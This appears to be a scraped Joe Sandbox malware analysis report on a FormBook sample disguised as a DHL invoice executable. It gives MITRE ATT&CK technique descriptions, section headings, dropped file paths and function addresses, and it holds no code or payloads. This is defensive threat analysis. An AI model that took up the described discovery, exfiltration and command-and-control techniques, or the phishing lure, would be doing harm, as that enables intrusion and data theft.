Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL Factura Electronica Pendiente documento No 04BB25083.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Factura Electronica Pendiente documento No 04BB25083.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44mmvcvn.agd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvubf43u.z5q.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipifyeev.13a.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5sgh1eb.iib.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
DHL Factura Electronica Pendiente documento No 04BB25083.exe

Function 00C2D380 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 07001C54 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 07001C60 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 00C2B0F0 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Function 00C25CEC Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 00C23E44 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 07001400 Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Function 070019D0 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON